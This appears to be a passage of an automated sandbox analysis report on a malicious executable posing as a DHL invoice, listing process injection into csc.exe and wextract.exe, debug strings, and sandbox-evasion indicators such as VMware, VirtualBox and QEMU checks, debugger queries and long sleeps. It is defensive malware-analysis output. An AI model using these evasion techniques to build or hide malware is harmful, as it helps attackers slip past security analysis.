            Source: Binary string: csc.pdb source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wextract.pdbGCTL source: csc.exe, 00000004.00000002.2074916274.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139831429.0000000000A08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.pdbp^ source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000004.00000003.1984836157.00000000053B5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1986270313.0000000005569000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.00000000058AE000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2076822878.0000000004230000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2078180097.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Configuration.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.pdbH source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp, dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB" source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Management.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Drawing.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Management.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbiX source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Static PE information: 0x916198D0 [Wed Apr 17 05:40:32 2047 UTC]
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Code function: 0_2_00007FFD9B89792B push ebx; retf 0_2_00007FFD9B89796A
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Code function: 0_2_00007FFD9B960050 push esp; retf 4810h 0_2_00007FFD9B960312
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Code function: 0_2_00007FFD9B9617B1 push ecx; iretd 0_2_00007FFD9B961A52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0041A89F push es; iretd 4_2_0041A8A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_004180AE pushfd ; iretd 4_2_004180B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00413A7D pushad ; retf 4_2_00413AEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00413AD6 pushad ; retf 4_2_00413AEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00413A94 pushad ; retf 4_2_00413AEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00413B02 pushad ; retf 4_2_00413AEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0040D39C push ecx; ret 4_2_0040D3A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0040AC52 push edx; iretd 4_2_0040ACA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0041EC7C pushfd ; retf 4_2_0041ECCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00417410 push edi; retf 4_2_00417411
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00402418 pushad ; retf 4_2_0040241B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00415C85 push ds; retf 4_2_00415CA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00415CA5 push ds; retf 4_2_00415CA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0041ECB8 pushfd ; retf 4_2_0041ECCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00426D53 push esp; ret 4_2_00426D6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00413DF2 push 5FA4C71Eh; retf 4_2_00413DF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00403590 push eax; ret 4_2_00403592
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00416DB7 push ebx; ret 4_2_00416DBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00408658 push esi; iretd 4_2_004086AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00411668 push cs; ret 4_2_00411671
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0040CEC6 push esi; retf 4_2_0040CEC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_004086B0 push esi; iretd 4_2_004086AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0040C790 push esp; retf 4_2_0040C791
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057409AD push ecx; mov dword ptr [esp], ecx 4_2_057409B6
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_045C09AD push ecx; mov dword ptr [esp], ecx 13_2_045C09B6
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_004050C5 push esi; iretd 13_2_0040511C
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_0040E0D5 push cs; ret 13_2_0040E0DE
            Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_00420140 push ss; retn 3B9Dh 13_2_004203D8

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wextract.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\SysWOW64\wextract.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\wextract.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\wextract.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\wextract.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\wextract.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\wextract.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\wextract.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\wextract.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLLP
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAMEP
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe Memory allocated: 2B47A4F0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe Memory allocated: 2B47BFE0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe File opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe File opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe File opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 4_2_0578096E rdtsc 4_2_0578096E
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6465
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3136
            Source: C:\Windows\SysWOW64\wextract.exe Window / User API: threadDelayed 2969
            Source: C:\Windows\SysWOW64\wextract.exe Window / User API: threadDelayed 7004
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\wextract.exe API coverage: 3.0 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4176 Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\wextract.exe TID: 7564 Thread sleep count: 2969 > 30
            Source: C:\Windows\SysWOW64\wextract.exe TID: 7564 Thread sleep time: -5938000s >= -30000s
            Source: C:\Windows\SysWOW64\wextract.exe TID: 7564 Thread sleep count: 7004 > 30
            Source: C:\Windows\SysWOW64\wextract.exe TID: 7564 Thread sleep time: -14008000s >= -30000s
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584 Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584 Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584 Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584 Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584 Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\wextract.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\wextract.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\wextract.exe Code function: 13_2_0041C2A0 FindFirstFileW,FindNextFileW,FindClose,13_2_0041C2A0
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QEMUP
            Source: Amcache.hve.7.dr Binary or memory string: VMware
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000705000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7#
            Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
            Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREP
            Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareP
            Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
            Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
            Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B400001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
            Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
            Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIP
            Source: rQkTBkrqhGpTBn.exe, 0000000E.00000002.4139670159.0000000000E2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: firefox.exe, 0000000F.00000002.2371356969.000001DA5EB2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
            Source: Amcache.hve.7.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0578096E rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_00417753 LdrLoadDll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05748550 mov eax, dword ptr fs:[00000030h]
